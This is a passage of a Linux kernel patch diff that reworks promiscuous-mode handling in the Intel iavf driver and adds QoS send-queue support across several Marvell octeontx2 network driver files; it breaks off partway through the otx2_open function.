+@@ -964,36 +964,57 @@ void iavf_set_promiscuous(struct iavf_adapter *adapter, int flags)
+ 		return;
+ 	}
+ 
+-	promisc_all = FLAG_VF_UNICAST_PROMISC |
+-		      FLAG_VF_MULTICAST_PROMISC;
+-	if ((flags & promisc_all) == promisc_all) {
+-		adapter->flags |= IAVF_FLAG_PROMISC_ON;
+-		adapter->aq_required &= ~IAVF_FLAG_AQ_REQUEST_PROMISC;
+-		dev_info(&adapter->pdev->dev, "Entering promiscuous mode\n");
+-	}
++	/* prevent changes to promiscuous flags */
++	spin_lock_bh(&adapter->current_netdev_promisc_flags_lock);
+ 
+-	if (flags & FLAG_VF_MULTICAST_PROMISC) {
+-		adapter->flags |= IAVF_FLAG_ALLMULTI_ON;
+-		adapter->aq_required &= ~IAVF_FLAG_AQ_REQUEST_ALLMULTI;
+-		dev_info(&adapter->pdev->dev, "%s is entering multicast promiscuous mode\n",
+-			 adapter->netdev->name);
++	/* sanity check to prevent duplicate AQ calls */
++	if (!iavf_promiscuous_mode_changed(adapter)) {
++		adapter->aq_required &= ~IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE;
++		dev_dbg(&adapter->pdev->dev, "No change in promiscuous mode\n");
++		/* allow changes to promiscuous flags */
++		spin_unlock_bh(&adapter->current_netdev_promisc_flags_lock);
++		return;
+ 	}
+ 
+-	if (!flags) {
+-		if (adapter->flags & IAVF_FLAG_PROMISC_ON) {
+-			adapter->flags &= ~IAVF_FLAG_PROMISC_ON;
+-			adapter->aq_required &= ~IAVF_FLAG_AQ_RELEASE_PROMISC;
+-			dev_info(&adapter->pdev->dev, "Leaving promiscuous mode\n");
+-		}
++	/* there are 2 bits, but only 3 states */
++	if (!(netdev->flags & IFF_PROMISC) &&
++	    netdev->flags & IFF_ALLMULTI) {
++		/* State 1  - only multicast promiscuous mode enabled
++		 * - !IFF_PROMISC && IFF_ALLMULTI
++		 */
++		flags = FLAG_VF_MULTICAST_PROMISC;
++		adapter->current_netdev_promisc_flags |= IFF_ALLMULTI;
++		adapter->current_netdev_promisc_flags &= ~IFF_PROMISC;
++		dev_info(&adapter->pdev->dev, "Entering multicast promiscuous mode\n");
++	} else if (!(netdev->flags & IFF_PROMISC) &&
++		   !(netdev->flags & IFF_ALLMULTI)) {
++		/* State 2 - unicast/multicast promiscuous mode disabled
++		 * - !IFF_PROMISC && !IFF_ALLMULTI
++		 */
++		flags = 0;
++		adapter->current_netdev_promisc_flags &=
++			~(IFF_PROMISC | IFF_ALLMULTI);
++		dev_info(&adapter->pdev->dev, "Leaving promiscuous mode\n");
++	} else {
++		/* State 3 - unicast/multicast promiscuous mode enabled
++		 * - IFF_PROMISC && IFF_ALLMULTI
++		 * - IFF_PROMISC && !IFF_ALLMULTI
++		 */
++		flags = FLAG_VF_UNICAST_PROMISC | FLAG_VF_MULTICAST_PROMISC;
++		adapter->current_netdev_promisc_flags |= IFF_PROMISC;
++		if (netdev->flags & IFF_ALLMULTI)
++			adapter->current_netdev_promisc_flags |= IFF_ALLMULTI;
++		else
++			adapter->current_netdev_promisc_flags &= ~IFF_ALLMULTI;
+ 
+-		if (adapter->flags & IAVF_FLAG_ALLMULTI_ON) {
+-			adapter->flags &= ~IAVF_FLAG_ALLMULTI_ON;
+-			adapter->aq_required &= ~IAVF_FLAG_AQ_RELEASE_ALLMULTI;
+-			dev_info(&adapter->pdev->dev, "%s is leaving multicast promiscuous mode\n",
+-				 adapter->netdev->name);
+-		}
++		dev_info(&adapter->pdev->dev, "Entering promiscuous mode\n");
+ 	}
+ 
++	adapter->aq_required &= ~IAVF_FLAG_AQ_CONFIGURE_PROMISC_MODE;
++
++	/* allow changes to promiscuous flags */
++	spin_unlock_bh(&adapter->current_netdev_promisc_flags_lock);
++
+ 	adapter->current_op = VIRTCHNL_OP_CONFIG_PROMISCUOUS_MODE;
+ 	vpi.vsi_id = adapter->vsi_res->vsi_id;
+ 	vpi.flags = flags;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index aadc352c2ffbd..5c9dc3f9262f5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -1222,6 +1222,11 @@ static int rvu_dbg_npa_ctx_display(struct seq_file *m, void *unused, int ctype)
+ 
+ 	for (aura = id; aura < max_id; aura++) {
+ 		aq_req.aura_id = aura;
++
++		/* Skip if queue is uninitialized */
++		if (ctype == NPA_AQ_CTYPE_POOL && !test_bit(aura, pfvf->pool_bmap))
++			continue;
++
+ 		seq_printf(m, "======%s : %d=======\n",
+ 			   (ctype == NPA_AQ_CTYPE_AURA) ? "AURA" : "POOL",
+ 			aq_req.aura_id);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/Makefile b/drivers/net/ethernet/marvell/octeontx2/nic/Makefile
+index 73fdb87986148..3d31ddf7c652e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/Makefile
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/Makefile
+@@ -8,7 +8,7 @@ obj-$(CONFIG_OCTEONTX2_VF) += rvu_nicvf.o otx2_ptp.o
+ 
+ rvu_nicpf-y := otx2_pf.o otx2_common.o otx2_txrx.o otx2_ethtool.o \
+                otx2_flows.o otx2_tc.o cn10k.o otx2_dmac_flt.o \
+-               otx2_devlink.o
++               otx2_devlink.o qos_sq.o
+ rvu_nicvf-y := otx2_vf.o otx2_devlink.o
+ 
+ rvu_nicpf-$(CONFIG_DCB) += otx2_dcbnl.o
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 011355e73696e..0f896f606c3e6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -513,8 +513,8 @@ void otx2_config_irq_coalescing(struct otx2_nic *pfvf, int qidx)
+ 		     (pfvf->hw.cq_ecount_wait - 1));
+ }
+ 
+-int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+-		      dma_addr_t *dma)
++static int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
++			     dma_addr_t *dma)
+ {
+ 	u8 *buf;
+ 
+@@ -532,8 +532,8 @@ int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+ 	return 0;
+ }
+ 
+-static int otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+-			   dma_addr_t *dma)
++int otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
++		    dma_addr_t *dma)
+ {
+ 	int ret;
+ 
+@@ -795,21 +795,21 @@ void otx2_txschq_stop(struct otx2_nic *pfvf)
+ void otx2_sqb_flush(struct otx2_nic *pfvf)
+ {
+ 	int qidx, sqe_tail, sqe_head;
++	struct otx2_snd_queue *sq;
+ 	u64 incr, *ptr, val;
+-	int timeout = 1000;
+ 
+ 	ptr = (u64 *)otx2_get_regaddr(pfvf, NIX_LF_SQ_OP_STATUS);
+-	for (qidx = 0; qidx < pfvf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pfvf); qidx++) {
++		sq = &pfvf->qset.sq[qidx];
++		if (!sq->sqb_ptrs)
++			continue;
++
+ 		incr = (u64)qidx << 32;
+-		while (timeout) {
+-			val = otx2_atomic64_add(incr, ptr);
+-			sqe_head = (val >> 20) & 0x3F;
+-			sqe_tail = (val >> 28) & 0x3F;
+-			if (sqe_head == sqe_tail)
+-				break;
+-			usleep_range(1, 3);
+-			timeout--;
+-		}
++		val = otx2_atomic64_add(incr, ptr);
++		sqe_head = (val >> 20) & 0x3F;
++		sqe_tail = (val >> 28) & 0x3F;
++		if (sqe_head != sqe_tail)
++			usleep_range(50, 60);
+ 	}
+ }
+ 
+@@ -899,7 +899,7 @@ int otx2_sq_aq_init(void *dev, u16 qidx, u16 sqb_aura)
+ 	return otx2_sync_mbox_msg(&pfvf->mbox);
+ }
+ 
+-static int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
++int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
+ {
+ 	struct otx2_qset *qset = &pfvf->qset;
+ 	struct otx2_snd_queue *sq;
+@@ -972,9 +972,17 @@ static int otx2_cq_init(struct otx2_nic *pfvf, u16 qidx)
+ 		cq->cint_idx = qidx - pfvf->hw.rx_queues;
+ 		cq->cqe_cnt = qset->sqe_cnt;
+ 	} else {
+-		cq->cq_type = CQ_XDP;
+-		cq->cint_idx = qidx - non_xdp_queues;
+-		cq->cqe_cnt = qset->sqe_cnt;
++		if (pfvf->hw.xdp_queues &&
++		    qidx < non_xdp_queues + pfvf->hw.xdp_queues) {
++			cq->cq_type = CQ_XDP;
++			cq->cint_idx = qidx - non_xdp_queues;
++			cq->cqe_cnt = qset->sqe_cnt;
++		} else {
++			cq->cq_type = CQ_QOS;
++			cq->cint_idx = qidx - non_xdp_queues -
++				       pfvf->hw.xdp_queues;
++			cq->cqe_cnt = qset->sqe_cnt;
++		}
+ 	}
+ 	cq->cqe_size = pfvf->qset.xqe_size;
+ 
+@@ -1085,7 +1093,7 @@ int otx2_config_nix_queues(struct otx2_nic *pfvf)
+ 	}
+ 
+ 	/* Initialize TX queues */
+-	for (qidx = 0; qidx < pfvf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < pfvf->hw.non_qos_queues; qidx++) {
+ 		u16 sqb_aura = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+ 
+ 		err = otx2_sq_init(pfvf, qidx, sqb_aura);
+@@ -1132,7 +1140,7 @@ int otx2_config_nix(struct otx2_nic *pfvf)
+ 
+ 	/* Set RQ/SQ/CQ counts */
+ 	nixlf->rq_cnt = pfvf->hw.rx_queues;
+-	nixlf->sq_cnt = pfvf->hw.tot_tx_queues;
++	nixlf->sq_cnt = otx2_get_total_tx_queues(pfvf);
+ 	nixlf->cq_cnt = pfvf->qset.cq_cnt;
+ 	nixlf->rss_sz = MAX_RSS_INDIR_TBL_SIZE;
+ 	nixlf->rss_grps = MAX_RSS_GROUPS;
+@@ -1170,7 +1178,7 @@ void otx2_sq_free_sqbs(struct otx2_nic *pfvf)
+ 	int sqb, qidx;
+ 	u64 iova, pa;
+ 
+-	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pfvf); qidx++) {
+ 		sq = &qset->sq[qidx];
+ 		if (!sq->sqb_ptrs)
+ 			continue;
+@@ -1238,8 +1246,8 @@ void otx2_aura_pool_free(struct otx2_nic *pfvf)
+ 	pfvf->qset.pool = NULL;
+ }
+ 
+-static int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
+-			  int pool_id, int numptrs)
++int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
++		   int pool_id, int numptrs)
+ {
+ 	struct npa_aq_enq_req *aq;
+ 	struct otx2_pool *pool;
+@@ -1315,8 +1323,8 @@ static int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
+ 	return 0;
+ }
+ 
+-static int otx2_pool_init(struct otx2_nic *pfvf, u16 pool_id,
+-			  int stack_pages, int numptrs, int buf_size)
++int otx2_pool_init(struct otx2_nic *pfvf, u16 pool_id,
++		   int stack_pages, int numptrs, int buf_size)
+ {
+ 	struct npa_aq_enq_req *aq;
+ 	struct otx2_pool *pool;
+@@ -1386,7 +1394,7 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	stack_pages =
+ 		(num_sqbs + hw->stack_pg_ptrs - 1) / hw->stack_pg_ptrs;
+ 
+-	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < hw->non_qos_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+ 		/* Initialize aura context */
+ 		err = otx2_aura_init(pfvf, pool_id, pool_id, num_sqbs);
+@@ -1406,7 +1414,7 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 		goto fail;
+ 
+ 	/* Allocate pointers and free them to aura/pool */
+-	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < hw->non_qos_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+ 		pool = &pfvf->qset.pool[pool_id];
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 8a9793b06769f..efd66224b3dbf 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -27,6 +27,7 @@
+ #include "otx2_txrx.h"
+ #include "otx2_devlink.h"
+ #include <rvu_trace.h>
++#include "qos.h"
+ 
+ /* PCI device IDs */
+ #define PCI_DEVID_OCTEONTX2_RVU_PF              0xA063
+@@ -186,7 +187,8 @@ struct otx2_hw {
+ 	u16                     rx_queues;
+ 	u16                     tx_queues;
+ 	u16                     xdp_queues;
+-	u16                     tot_tx_queues;
++	u16			tc_tx_queues;
++	u16                     non_qos_queues; /* tx queues plus xdp queues */
+ 	u16			max_queues;
+ 	u16			pool_cnt;
+ 	u16			rqpool_cnt;
+@@ -498,6 +500,8 @@ struct otx2_nic {
+ 	u16			pfc_schq_list[NIX_TXSCH_LVL_CNT][MAX_TXSCHQ_PER_FUNC];
+ 	bool			pfc_alloc_status[NIX_PF_PFC_PRIO_MAX];
+ #endif
++	/* qos */
++	struct otx2_qos		qos;
+ 
+ 	/* napi event count. It is needed for adaptive irq coalescing. */
+ 	u32 napi_events;
+@@ -742,8 +746,7 @@ static inline void cn10k_aura_freeptr(void *dev, int aura, u64 buf)
+ /* Alloc pointer from pool/aura */
+ static inline u64 otx2_aura_allocptr(struct otx2_nic *pfvf, int aura)
+ {
+-	u64 *ptr = (u64 *)otx2_get_regaddr(pfvf,
+-			   NPA_LF_AURA_OP_ALLOCX(0));
++	u64 *ptr = (__force u64 *)otx2_get_regaddr(pfvf, NPA_LF_AURA_OP_ALLOCX(0));
+ 	u64 incr = (u64)aura | BIT_ULL(63);
+ 
+ 	return otx2_atomic64_add(incr, ptr);
+@@ -885,12 +888,23 @@ static inline void otx2_dma_unmap_page(struct otx2_nic *pfvf,
+ 
+ static inline u16 otx2_get_smq_idx(struct otx2_nic *pfvf, u16 qidx)
+ {
++	u16 smq;
+ #ifdef CONFIG_DCB
+ 	if (qidx < NIX_PF_PFC_PRIO_MAX && pfvf->pfc_alloc_status[qidx])
+ 		return pfvf->pfc_schq_list[NIX_TXSCH_LVL_SMQ][qidx];
+ #endif
++	/* check if qidx falls under QOS queues */
++	if (qidx >= pfvf->hw.non_qos_queues)
++		smq = pfvf->qos.qid_to_sqmap[qidx - pfvf->hw.non_qos_queues];
++	else
++		smq = pfvf->hw.txschq_list[NIX_TXSCH_LVL_SMQ][0];
+ 
+-	return pfvf->hw.txschq_list[NIX_TXSCH_LVL_SMQ][0];
++	return smq;
++}
++
++static inline u16 otx2_get_total_tx_queues(struct otx2_nic *pfvf)
++{
++	return pfvf->hw.non_qos_queues + pfvf->hw.tc_tx_queues;
+ }
+ 
+ /* MSI-X APIs */
+@@ -919,18 +933,24 @@ int otx2_txschq_config(struct otx2_nic *pfvf, int lvl, int prio, bool pfc_en);
+ int otx2_txsch_alloc(struct otx2_nic *pfvf);
+ void otx2_txschq_stop(struct otx2_nic *pfvf);
+ void otx2_txschq_free_one(struct otx2_nic *pfvf, u16 lvl, u16 schq);
++void otx2_free_pending_sqe(struct otx2_nic *pfvf);
+ void otx2_sqb_flush(struct otx2_nic *pfvf);
+-int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+-		      dma_addr_t *dma);
++int otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
++		    dma_addr_t *dma);
+ int otx2_rxtx_enable(struct otx2_nic *pfvf, bool enable);
+ void otx2_ctx_disable(struct mbox *mbox, int type, bool npa);
+ int otx2_nix_config_bp(struct otx2_nic *pfvf, bool enable);
+ void otx2_cleanup_rx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq);
+ void otx2_cleanup_tx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq);
++int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura);
+ int otx2_sq_aq_init(void *dev, u16 qidx, u16 sqb_aura);
+ int cn10k_sq_aq_init(void *dev, u16 qidx, u16 sqb_aura);
+ int otx2_alloc_buffer(struct otx2_nic *pfvf, struct otx2_cq_queue *cq,
+ 		      dma_addr_t *dma);
++int otx2_pool_init(struct otx2_nic *pfvf, u16 pool_id,
++		   int stack_pages, int numptrs, int buf_size);
++int otx2_aura_init(struct otx2_nic *pfvf, int aura_id,
++		   int pool_id, int numptrs);
+ 
+ /* RSS configuration APIs*/
+ int otx2_rss_init(struct otx2_nic *pfvf);
+@@ -1038,4 +1058,14 @@ static inline void cn10k_handle_mcs_event(struct otx2_nic *pfvf,
+ {}
+ #endif /* CONFIG_MACSEC */
+ 
++/* qos support */
++static inline void otx2_qos_init(struct otx2_nic *pfvf, int qos_txqs)
++{
++	struct otx2_hw *hw = &pfvf->hw;
++
++	hw->tc_tx_queues = qos_txqs;
++}
++
++u16 otx2_select_queue(struct net_device *netdev, struct sk_buff *skb,
++		      struct net_device *sb_dev);
+ #endif /* OTX2_COMMON_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 17e546d0d7e55..c724131172f3f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -23,6 +23,7 @@
+ #include "otx2_struct.h"
+ #include "otx2_ptp.h"
+ #include "cn10k.h"
++#include "qos.h"
+ #include <rvu_trace.h>
+ 
+ #define DRV_NAME	"rvu_nicpf"
+@@ -1194,36 +1195,38 @@ static char *nix_mnqerr_e_str[NIX_MNQERR_MAX] = {
+ };
+ 
+ static char *nix_snd_status_e_str[NIX_SND_STATUS_MAX] =  {
+-	"NIX_SND_STATUS_GOOD",
+-	"NIX_SND_STATUS_SQ_CTX_FAULT",
+-	"NIX_SND_STATUS_SQ_CTX_POISON",
+-	"NIX_SND_STATUS_SQB_FAULT",
+-	"NIX_SND_STATUS_SQB_POISON",
+-	"NIX_SND_STATUS_HDR_ERR",
+-	"NIX_SND_STATUS_EXT_ERR",
+-	"NIX_SND_STATUS_JUMP_FAULT",
+-	"NIX_SND_STATUS_JUMP_POISON",
+-	"NIX_SND_STATUS_CRC_ERR",
+-	"NIX_SND_STATUS_IMM_ERR",
+-	"NIX_SND_STATUS_SG_ERR",
+-	"NIX_SND_STATUS_MEM_ERR",
+-	"NIX_SND_STATUS_INVALID_SUBDC",
+-	"NIX_SND_STATUS_SUBDC_ORDER_ERR",
+-	"NIX_SND_STATUS_DATA_FAULT",
+-	"NIX_SND_STATUS_DATA_POISON",
+-	"NIX_SND_STATUS_NPC_DROP_ACTION",
+-	"NIX_SND_STATUS_LOCK_VIOL",
+-	"NIX_SND_STATUS_NPC_UCAST_CHAN_ERR",
+-	"NIX_SND_STATUS_NPC_MCAST_CHAN_ERR",
+-	"NIX_SND_STATUS_NPC_MCAST_ABORT",
+-	"NIX_SND_STATUS_NPC_VTAG_PTR_ERR",
+-	"NIX_SND_STATUS_NPC_VTAG_SIZE_ERR",
+-	"NIX_SND_STATUS_SEND_STATS_ERR",
++	[NIX_SND_STATUS_GOOD] = "NIX_SND_STATUS_GOOD",
++	[NIX_SND_STATUS_SQ_CTX_FAULT] = "NIX_SND_STATUS_SQ_CTX_FAULT",
++	[NIX_SND_STATUS_SQ_CTX_POISON] = "NIX_SND_STATUS_SQ_CTX_POISON",
++	[NIX_SND_STATUS_SQB_FAULT] = "NIX_SND_STATUS_SQB_FAULT",
++	[NIX_SND_STATUS_SQB_POISON] = "NIX_SND_STATUS_SQB_POISON",
++	[NIX_SND_STATUS_HDR_ERR] = "NIX_SND_STATUS_HDR_ERR",
++	[NIX_SND_STATUS_EXT_ERR] = "NIX_SND_STATUS_EXT_ERR",
++	[NIX_SND_STATUS_JUMP_FAULT] = "NIX_SND_STATUS_JUMP_FAULT",
++	[NIX_SND_STATUS_JUMP_POISON] = "NIX_SND_STATUS_JUMP_POISON",
++	[NIX_SND_STATUS_CRC_ERR] = "NIX_SND_STATUS_CRC_ERR",
++	[NIX_SND_STATUS_IMM_ERR] = "NIX_SND_STATUS_IMM_ERR",
++	[NIX_SND_STATUS_SG_ERR] = "NIX_SND_STATUS_SG_ERR",
++	[NIX_SND_STATUS_MEM_ERR] = "NIX_SND_STATUS_MEM_ERR",
++	[NIX_SND_STATUS_INVALID_SUBDC] = "NIX_SND_STATUS_INVALID_SUBDC",
++	[NIX_SND_STATUS_SUBDC_ORDER_ERR] = "NIX_SND_STATUS_SUBDC_ORDER_ERR",
++	[NIX_SND_STATUS_DATA_FAULT] = "NIX_SND_STATUS_DATA_FAULT",
++	[NIX_SND_STATUS_DATA_POISON] = "NIX_SND_STATUS_DATA_POISON",
++	[NIX_SND_STATUS_NPC_DROP_ACTION] = "NIX_SND_STATUS_NPC_DROP_ACTION",
++	[NIX_SND_STATUS_LOCK_VIOL] = "NIX_SND_STATUS_LOCK_VIOL",
++	[NIX_SND_STATUS_NPC_UCAST_CHAN_ERR] = "NIX_SND_STAT_NPC_UCAST_CHAN_ERR",
++	[NIX_SND_STATUS_NPC_MCAST_CHAN_ERR] = "NIX_SND_STAT_NPC_MCAST_CHAN_ERR",
++	[NIX_SND_STATUS_NPC_MCAST_ABORT] = "NIX_SND_STATUS_NPC_MCAST_ABORT",
++	[NIX_SND_STATUS_NPC_VTAG_PTR_ERR] = "NIX_SND_STATUS_NPC_VTAG_PTR_ERR",
++	[NIX_SND_STATUS_NPC_VTAG_SIZE_ERR] = "NIX_SND_STATUS_NPC_VTAG_SIZE_ERR",
++	[NIX_SND_STATUS_SEND_MEM_FAULT] = "NIX_SND_STATUS_SEND_MEM_FAULT",
++	[NIX_SND_STATUS_SEND_STATS_ERR] = "NIX_SND_STATUS_SEND_STATS_ERR",
+ };
+ 
+ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ {
+ 	struct otx2_nic *pf = data;
++	struct otx2_snd_queue *sq;
+ 	u64 val, *ptr;
+ 	u64 qidx = 0;
+ 
+@@ -1238,14 +1241,16 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 			continue;
+ 
+ 		if (val & BIT_ULL(42)) {
+-			netdev_err(pf->netdev, "CQ%lld: error reading NIX_LF_CQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
++			netdev_err(pf->netdev,
++				   "CQ%lld: error reading NIX_LF_CQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
+ 				   qidx, otx2_read64(pf, NIX_LF_ERR_INT));
+ 		} else {
+ 			if (val & BIT_ULL(NIX_CQERRINT_DOOR_ERR))
+ 				netdev_err(pf->netdev, "CQ%lld: Doorbell error",
+ 					   qidx);
+ 			if (val & BIT_ULL(NIX_CQERRINT_CQE_FAULT))
+-				netdev_err(pf->netdev, "CQ%lld: Memory fault on CQE write to LLC/DRAM",
++				netdev_err(pf->netdev,
++					   "CQ%lld: Memory fault on CQE write to LLC/DRAM",
+ 					   qidx);
+ 		}
+ 
+@@ -1253,10 +1258,14 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 	}
+ 
+ 	/* SQ */
+-	for (qidx = 0; qidx < pf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pf); qidx++) {
+ 		u64 sq_op_err_dbg, mnq_err_dbg, snd_err_dbg;
+ 		u8 sq_op_err_code, mnq_err_code, snd_err_code;
+ 
++		sq = &pf->qset.sq[qidx];
++		if (!sq->sqb_ptrs)
++			continue;
++
+ 		/* Below debug registers captures first errors corresponding to
+ 		 * those registers. We don't have to check against SQ qid as
+ 		 * these are fatal errors.
+@@ -1268,7 +1277,8 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 			     (val & NIX_SQINT_BITS));
+ 
+ 		if (val & BIT_ULL(42)) {
+-			netdev_err(pf->netdev, "SQ%lld: error reading NIX_LF_SQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
++			netdev_err(pf->netdev,
++				   "SQ%lld: error reading NIX_LF_SQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
+ 				   qidx, otx2_read64(pf, NIX_LF_ERR_INT));
+ 			goto done;
+ 		}
+@@ -1278,8 +1288,11 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 			goto chk_mnq_err_dbg;
+ 
+ 		sq_op_err_code = FIELD_GET(GENMASK(7, 0), sq_op_err_dbg);
+-		netdev_err(pf->netdev, "SQ%lld: NIX_LF_SQ_OP_ERR_DBG(%llx)  err=%s\n",
+-			   qidx, sq_op_err_dbg, nix_sqoperr_e_str[sq_op_err_code]);
++		netdev_err(pf->netdev,
++			   "SQ%lld: NIX_LF_SQ_OP_ERR_DBG(0x%llx)  err=%s(%#x)\n",
++			   qidx, sq_op_err_dbg,
++			   nix_sqoperr_e_str[sq_op_err_code],
++			   sq_op_err_code);
+ 
+ 		otx2_write64(pf, NIX_LF_SQ_OP_ERR_DBG, BIT_ULL(44));
+ 
+@@ -1296,16 +1309,21 @@ chk_mnq_err_dbg:
+ 			goto chk_snd_err_dbg;
+ 
+ 		mnq_err_code = FIELD_GET(GENMASK(7, 0), mnq_err_dbg);
+-		netdev_err(pf->netdev, "SQ%lld: NIX_LF_MNQ_ERR_DBG(%llx)  err=%s\n",
+-			   qidx, mnq_err_dbg,  nix_mnqerr_e_str[mnq_err_code]);
++		netdev_err(pf->netdev,
++			   "SQ%lld: NIX_LF_MNQ_ERR_DBG(0x%llx)  err=%s(%#x)\n",
++			   qidx, mnq_err_dbg,  nix_mnqerr_e_str[mnq_err_code],
++			   mnq_err_code);
+ 		otx2_write64(pf, NIX_LF_MNQ_ERR_DBG, BIT_ULL(44));
+ 
+ chk_snd_err_dbg:
+ 		snd_err_dbg = otx2_read64(pf, NIX_LF_SEND_ERR_DBG);
+ 		if (snd_err_dbg & BIT(44)) {
+ 			snd_err_code = FIELD_GET(GENMASK(7, 0), snd_err_dbg);
+-			netdev_err(pf->netdev, "SQ%lld: NIX_LF_SND_ERR_DBG:0x%llx err=%s\n",
+-				   qidx, snd_err_dbg, nix_snd_status_e_str[snd_err_code]);
++			netdev_err(pf->netdev,
++				   "SQ%lld: NIX_LF_SND_ERR_DBG:0x%llx err=%s(%#x)\n",
++				   qidx, snd_err_dbg,
++				   nix_snd_status_e_str[snd_err_code],
++				   snd_err_code);
+ 			otx2_write64(pf, NIX_LF_SEND_ERR_DBG, BIT_ULL(44));
+ 		}
+ 
+@@ -1379,7 +1397,7 @@ static void otx2_free_sq_res(struct otx2_nic *pf)
+ 	otx2_ctx_disable(&pf->mbox, NIX_AQ_CTYPE_SQ, false);
+ 	/* Free SQB pointers */
+ 	otx2_sq_free_sqbs(pf);
+-	for (qidx = 0; qidx < pf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pf); qidx++) {
+ 		sq = &qset->sq[qidx];
+ 		qmem_free(pf->dev, sq->sqe);
+ 		qmem_free(pf->dev, sq->tso_hdrs);
+@@ -1429,7 +1447,7 @@ static int otx2_init_hw_resources(struct otx2_nic *pf)
+ 	 * so, aura count = pool count.
+ 	 */
+ 	hw->rqpool_cnt = hw->rx_queues;
+-	hw->sqpool_cnt = hw->tot_tx_queues;
++	hw->sqpool_cnt = otx2_get_total_tx_queues(pf);
+ 	hw->pool_cnt = hw->rqpool_cnt + hw->sqpool_cnt;
+ 
+ 	/* Maximum hardware supported transmit length */
+@@ -1578,6 +1596,7 @@ static void otx2_free_hw_resources(struct otx2_nic *pf)
+ 		else
+ 			otx2_cleanup_tx_cqes(pf, cq);
+ 	}
++	otx2_free_pending_sqe(pf);
+ 
+ 	otx2_free_sq_res(pf);
+ 
+@@ -1682,11 +1701,14 @@ int otx2_open(struct net_device *netdev)
+ 
+ 	netif_carrier_off(netdev);
+ 
+-	pf->qset.cq_cnt = pf->hw.rx_queues + pf->hw.tot_tx_queues;
+ 	/* RQ and SQs are mapped to different CQs,
+ 	 * so find out max CQ IRQs (i.e CINTs) needed.
+ 	 */
+-	pf->hw.cint_cnt = max(pf->hw.rx_queues, pf->hw.tx_queues);
++	pf->hw.cint_cnt = max3(pf->hw.rx_queues, pf->hw.tx_queues,
++			       pf->hw.tc_tx_queues);
++
++	pf->qset.cq_cnt = pf->hw.rx_queues + otx2_get_total_tx_queues(pf);
++
+ 	qset->napi = kcalloc(pf->hw.cint_cnt, sizeof(*cq_poll), GFP_KERNEL);
+ 	if (!qset->napi)
+ 		return -ENOMEM;
+@@ -1702,7 +1724,7 @@ int otx2_open(struct net_device *netdev)
+ 	if (!qset->cq)
+ 		goto err_free_mem;
+ 
+-	qset->sq = kcalloc(pf->hw.tot_tx_queues,
++	qset->sq = kcalloc(pf->hw.non_qos_queues,
+ 			   sizeof(struct otx2_snd_queue), GFP_KERNEL);
+ 	if (!qset->sq)
